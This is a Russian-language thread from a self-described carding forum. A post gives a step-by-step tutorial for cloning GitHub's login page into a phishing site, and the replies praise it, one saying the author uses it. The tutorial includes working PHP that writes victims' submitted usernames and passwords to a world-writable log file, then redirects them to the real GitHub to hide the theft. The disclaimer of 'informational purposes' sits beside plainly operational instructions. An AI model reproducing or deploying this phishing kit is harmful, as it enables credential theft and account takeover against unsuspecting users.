Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Фишинг

Engopa

Участник клуба
Регистрация
3 Дек 2021
Сообщения
219
Реакции
26
Депозит
170$
В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!

Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Теория об фишинге​

Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.

Приступим к первому этапу​

Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github.com/login

Для РИПа (клонирования) будем использовать сервис - WebParse

Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:
После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:

Второй этап​

Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:

Меняем его на auth.php

На скрине параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base:

594d2ee48104dd9f859c6.png

Onion.net
Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:
Код:
<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>
file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Теперь загружаем всё это дело на хостинг, а папке base даём права 777

e08db6266d4850e2df535.jpg


Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен.com/base/ds_logs.txt

Название папки и имя .txt файла можно поменять в auth.php
Пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

Код:
header('Location: https://github.com/session');
После ввода логина и пароля, жертва переместится по ссылке github.com/session тем временем у нас:

5b4a50f01878d36eb2878.png


На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блекджеком и шлюхами.
 

Operatim

Опытный user
Регистрация
29 Май 2020
Сообщения
232
Реакции
3
Годняк,сохраню мануал себе,спасибо
 

Jakkan

Участник клуба
Регистрация
12 Авг 2020
Сообщения
917
Реакции
30
Спасибо, хороший гайд.
 

BendrickGood

Опытный user
Регистрация
9 Июл 2021
Сообщения
712
Реакции
16
Рабочий гайд, использую
 

noet

Опытный user
Регистрация
2 Авг 2021
Сообщения
158
Реакции
10
хороший гайд
 
Сверху Снизу